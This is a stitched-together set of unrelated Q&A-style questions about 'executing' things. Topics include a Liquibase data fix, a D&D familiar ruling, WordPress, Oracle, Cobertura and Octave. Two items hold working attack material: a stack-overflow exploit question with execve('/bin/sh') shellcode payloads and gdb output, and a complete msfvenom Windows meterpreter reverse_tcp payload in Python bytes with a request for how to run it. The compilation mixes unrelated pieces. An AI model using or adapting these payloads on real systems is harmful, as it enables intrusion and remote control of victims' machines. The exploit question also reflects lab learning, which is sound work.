Executing a query on the production to fix erroring data

During the creation of some data on the production server by our backend, an unexpected error occurred and some data became inaccessible. Currently, a fix is being found for the error, but the flawed data is still on the server, causing some trouble. This can easily be fixed by setting some data to NULL. The question is, how should we handle this? Our backend uses the Spring framework and Liquibase to update the schema when necessary. Our production server is managed by a different company and is unaccessible for us (the developers). The other company wants us to write an entry for the Liquibase XML file to fix this. We are questioning this decision, but running a query on the production database seems tricky too.

Note: we are running more than just the production environment, so by adding the query to the Liquibase XML file, it will run on all environments.

Owl familiar capabilities while executing the Dragon’s Breath cone

I just had a session last night, when I was trying to execute Dragon’s Breath with my owl familiar for the extra damage of course. DM didn’t allow me to fly from one side of the room to the other and start my 15′ cone on the tile of my choosing.

They said the reason was that it was too intricate of a maneuver and that the owl couldn’t fulfill that type of action. The issue is where and how the owl will execute. They are stating that it only obeys commands and that it executes on its own accord basically. I was trying to start the cone on a tile with an enemy and the backspray not hitting my companions and the DM wouldn’t allow it.

Nothing written stated any drawback on this ability. Owl also has Flyby, which should tell you that it is capable of accurate maneuvers. Is my DM correct or can my familiar do this?


This question is not if the owl can perform the cone, that has been granted. But what remains is the intelligence needed to perform “more intricate maneuvers when executing the cone”. Dragon’s Breath should have something there if intelligence score was an issue, if a creature can be gifted the spell it should be able to perform the execution in any way the caster should see fit. IMO. Again all that was commanded of the Owl was to strafe from one side of the room to the other then deliver the cone on the tile of my choosing. How else should the placement of the cone work?

Child theme functions.php is not executing

WordPress + WooCoomerce + Storefront theme + Storefront child theme.

I have the child theme’s functions.php file from previous site development iteration which used to work. After migrating to new hosting I set up from the scratch same set of WordPress + WooCoomerce + Storefront theme + made Storefront child theme. The only diference with previous iteration is set of plug-ins and CSS rules/styling but custom code in functions.php is not touching them at all. Hoever then I copied functions.php from the previous site iteration it seems to be not executed at all. Trying to fix that I plaied a bit with file permissions on OS level: now it is set to rwxrwxrwx (I know it is not safe but I totaly run out of ideas of what is happening)

What might be going wrong with functions.php?

Here goes the functions.php contents

<?php // Exit if accessed directly if ( !defined( 'ABSPATH' ) ) exit;   // BEGIN ENQUEUE PARENT ACTION // AUTO GENERATED - Do not modify or remove comment markers above or below:  if ( !function_exists( 'chld_thm_cfg_locale_css' ) ):     function chld_thm_cfg_locale_css( $  uri ){         if ( empty( $  uri ) && is_rtl() && file_exists( get_template_directory() . '/rtl.css' ) )             $  uri = get_template_directory_uri() . '/rtl.css';         return $  uri;     } endif; add_filter( 'locale_stylesheet_uri', 'chld_thm_cfg_locale_css' );           if ( !function_exists( 'child_theme_configurator_css' ) ):     function child_theme_configurator_css() {         wp_enqueue_style( 'chld_thm_cfg_separate', trailingslashit( get_stylesheet_directory_uri() ) . 'ctc-style.css', array( 'storefront-gutenberg-blocks','storefront-style','storefront-style','storefront-icons','storefront-jetpack-widgets','storefront-woocommerce-style' ) );     } endif; add_action( 'wp_enqueue_scripts', 'child_theme_configurator_css', 30 );  // END ENQUEUE PARENT ACTION   add_filter( 'storefront_credit_link', '__return_false' );   add_filter( 'woocommerce_variable_price_html', 'variation_price', 20, 2 );  function variation_price( $  price, $  product ) {       $  min_regular_price = $  product->get_variation_regular_price( 'min', true );     $  min_sale_price = $  product->get_variation_sale_price( 'min', true );     $  max_regular_price = $  product->get_variation_regular_price( 'max', true );     $  max_sale_price = $  product->get_variation_sale_price( 'max', true );       if ( ! ( $  min_regular_price == $  max_regular_price && $  min_sale_price == $  max_sale_price ) ) {         if ( $  min_sale_price < $  min_regular_price ) {             $  price = sprintf( '<span>from </span><del>%1$  s</del><ins>%2$  s</ins>', wc_price( $  min_regular_price ), wc_price( $  min_sale_price ) );         } else {             $  price = sprintf( '<span>from </span>%1$  s', wc_price( $  min_regular_price ) );         }     }       return $  price;   }   function short_woocommerce_product_titles_words( $  title, $  id ) {   if ( ( is_shop() || is_product_tag() || is_product_category() ) && get_post_type( $  id ) === 'product' ) {     $  title_words = explode(" ", $  title);     if ( count($  title_words) > 6 ) { // Kicks in if the product title is longer than 6 words       // Shortens the title to 6 words and adds ellipsis at the end       return implode(" ", array_slice($  title_words, 0, 6)) . '...';     } else {       return $  title; // If the title isn't longer than 6 words, it will be returned in its full length without the ellipsis     }   } else {     return $  title;   } } add_filter( 'the_title', 'short_woocommerce_product_titles_words', 10, 2 );   remove_action( 'storefront_header', 'storefront_product_search', 40); add_action( 'storefront_header', 'storefront_product_search', 25 ); 

Oracle19C installation is stuck at executing datapatch in Windows 10 using dbca

I tried using dbca. There are no errors. It just hangs. I tried leaving it running for 4 hours. It is always stuck at 36% even after multiple tries.

Logs:

[progressPage.flowWorker] [ 2020-05-25 00:26:04.206 IST ] [CloneDBCreationStep.executeImpl:823] executing datapatch %ORACLE_HOME%\OPatch\datapatch.bat

Cobertura (Coverage Testing Tool) : Problem with executing .jar file and displaying the form?

I want to use cobertura for coverage testing. I followed the following link:

Cobertura Link

That link provides a EC-Cobertura.jar file through download. I think it creates a parameter for passing arguments to cobertura. I am trying to run EC-Cobertura.jar but its giving me error:

:~/cobertura$   ls -l EC-Cobertura.jar -rw-rw-r-- 1 zulfi zulfi 165174 Mar  8 17:53 EC-Cobertura.jar :~/cobertura$   java -jar EC-Cobertura.jar no main manifest attribute,in EC-Cobertura.jar 

Jar file error

:~/cobertura$   chmod a+rx EC-Cobertura.jar   :~/cobertura$    ./EC-Cobertura.jar   no main manifest attribute, in cobertura/EC-Cobertura.jar :~/cobertura$   

I have already downloaded the cobertura and its installed on my ubuntu 18.04.

:~$   whereis cobertura-instrument cobertura-instrument:  /usr/bin/cobertura-instrument  /usr/share/man/man1/cobertura-instrument.1.gz :~$   

And it has the same version as the tar file provides whose link is :

cobertura download link

provided in the link of the associated help button page:

:~$   cobertura-instrument -version   Cobertura 2.1.1 - GNU GPL License  (NO WARRANTY) - See COPYRIGHT file [INFO] Cobertura: Saved information  on 0 classes. [INFO] Cobertura: Saved information on 0 classes. :~$   

But the help file does not say anything about the jar file. I still don’t know how to execute the jar file and how to display the form shown on the link:

plugin link

Somebody please guide me how to display the form? What is the purpose of EC-Cobertura.jar in this connection.

Zulfi.

EIP pointing to shellcode but shellcode is not executing?

I have successfully overwritten the EIP register (pointing to my shellcode) but the shellcode is not executing. I compiled with the command

gcc -g -fno-stack-protector -z execstack -no-pie vuln.c -o vuln  

Here’s the output of gdb-peda (attempt 1):

[----------------------------------registers-----------------------------------] EAX: 0x0  EBX: 0x0  ECX: 0xbffff2a5 ("//shh/bin13PS110\v", '0' <repeats 24 times>, "5277") EDX: 0xb7fba01c --> 0x0  ESI: 0xb7fb8000 --> 0x1d6d6c  EDI: 0xb7fb8000 --> 0x1d6d6c  EBP: 0x0  ESP: 0xbffff2a5 ("//shh/bin13PS110\v", '0' <repeats 24 times>, "5277") EIP: 0x6850c031 EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] Invalid $  PC address: 0x6850c031 [------------------------------------stack-------------------------------------] 0000| 0xbffff2a5 ("//shh/bin13PS110\v", '0' <repeats 24 times>, "5277") 0004| 0xbffff2a9 ("h/bin13PS110\v", '0' <repeats 24 times>, "5277") 0008| 0xbffff2ad --> 0x50e3896e  0012| 0xbffff2b1 --> 0xb0e18953  0016| 0xbffff2b5 --> 0x9080cd0b  0020| 0xbffff2b9 --> 0x90909090  0024| 0xbffff2bd --> 0x90909090  0028| 0xbffff2c1 --> 0x90909090  [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x6850c031 in ?? () gdb-peda$   run < <(python -c "print 'A'*17 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + '\x90'*24 + '\xbf\xff\xf2\xa5'[::-1]") 

Output of gdb-peda (attempt 2):

gdb-peda$   run < <(python -c "print '\x90'*25 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80NOOOOPPPPQQQQQQQ' + '\xbf\xff\xf2\xad'[::-1]") Starting program: /home/kali/Desktop/exploit-excersises/stack5 < <(python -c "print '\x90'*25 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80NOOOOPPPPQQQQQQQ' + '\xbf\xff\xf2\xad'[::-1]")  Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] EAX: 0x0  EBX: 0x0  ECX: 0xbffff2ad ("//shh/bin13PS110\vNOOOOPPPPQQQQQQQ5277") EDX: 0xb7fba01c --> 0x0  ESI: 0xb7fb8000 --> 0x1d6d6c  EDI: 0xb7fb8000 --> 0x1d6d6c  EBP: 0x0  ESP: 0xbffff2ad ("//shh/bin13PS110\vNOOOOPPPPQQQQQQQ5277") EIP: 0x6850c031 EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] Invalid $  PC address: 0x6850c031 [------------------------------------stack-------------------------------------] 0000| 0xbffff2ad ("//shh/bin13PS110\vNOOOOPPPPQQQQQQQ5277") 0004| 0xbffff2b1 ("h/bin13PS110\vNOOOOPPPPQQQQQQQ5277") 0008| 0xbffff2b5 --> 0x50e3896e  0012| 0xbffff2b9 --> 0xb0e18953  0016| 0xbffff2bd --> 0x4e80cd0b  0020| 0xbffff2c1 ("OOOOPPPPQQQQQQQ5277") 0024| 0xbffff2c5 ("PPPPQQQQQQQ5277") 0028| 0xbffff2c9 ("QQQQQQQ5277") [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x6850c031 in ?? () 

Disassembled main function:

gdb-peda$   disas main Dump of assembler code for function main:    0x08049162 <+0>:     lea    ecx,[esp+0x4]    0x08049166 <+4>:     and    esp,0xfffffff0    0x08049169 <+7>:     push   DWORD PTR [ecx-0x4]    0x0804916c <+10>:    push   ebp    0x0804916d <+11>:    mov    ebp,esp    0x0804916f <+13>:    push   ebx    0x08049170 <+14>:    push   ecx    0x08049171 <+15>:    sub    esp,0x40    0x08049174 <+18>:    call   0x804919e <__x86.get_pc_thunk.ax>    0x08049179 <+23>:    add    eax,0x2e87    0x0804917e <+28>:    sub    esp,0xc    0x08049181 <+31>:    lea    edx,[ebp-0x48]    0x08049184 <+34>:    push   edx    0x08049185 <+35>:    mov    ebx,eax    0x08049187 <+37>:    call   0x8049030 <gets@plt>    0x0804918c <+42>:    add    esp,0x10    0x0804918f <+45>:    mov    eax,0x0    0x08049194 <+50>:    lea    esp,[ebp-0x8]    0x08049197 <+53>:    pop    ecx    0x08049198 <+54>:    pop    ebx    0x08049199 <+55>:    pop    ebp    0x0804919a <+56>:    lea    esp,[ecx-0x4]    0x0804919d <+59>:    ret 

Source code:

#include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <string.h>  int main(int argc, char **argv) {   char buffer[64];    gets(buffer); } 

operating system:

Linux kali 5.4.0-kali3-686-pae #1 SMP Debian 5.4.13-1kali1 (2020-01-20) i686 GNU/Linux 

How could I get my shellcode to execute?

Is there any danger to downloading a malware binary, but not executing it?

I recently downloaded an ELF file which was discovered from an exploit attempt (wget to download this binary failed due to outgoing traffic being blocked if it isn’t whitelisted). I downloaded it into a VM in order to run some basic analysis on it and uploaded it to virustotal.

My question is, absent some sort of terrible vulnerability in how curl downloads files or how analysis tools handle the files, is there any danger to a binary simply being on your system, without it ever being executed?

How to go to the next line in Octave without executing?

I am a newbie in Octave, after writing a line in octave if I press enter it does not go to the next line but executes that line only…!! I have searched the internet for a day and found no useful content on this matter. Certain codes are not working for this, for example

enter image description here

This piece of code doesn’t give the desired output, when I type it like this and its get executed line by line. But if I type it like this–>

enter image description here

All in a single line it works fine and give me this desired output enter image description here

So, my question is How do I go to next line in Octave, without actually executing it??

Executing shellcode in python format

So after running the command:

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.31 lport=8080 -f py

I receive the output:

buf =  b"" buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" buf += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" buf += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" buf += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" buf += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" buf += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" buf += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" buf += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" buf += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" buf += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" buf += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68" buf += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8\xff" buf += b"\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80" buf += b"\x6b\x00\xff\xd5\x6a\x0a\x68\x0a\x00\x00\x1f\x68\x02" buf += b"\x00\x1f\x90\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50" buf += b"\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68" buf += b"\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08" buf += b"\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a\x04\x56\x57" buf += b"\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b" buf += b"\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58" buf += b"\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68" buf += b"\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68" buf += b"\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff" buf += b"\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c" buf += b"\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01" buf += b"\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00" buf += b"\x53\xff\xd5" 

How could I execute this code inside of a python script?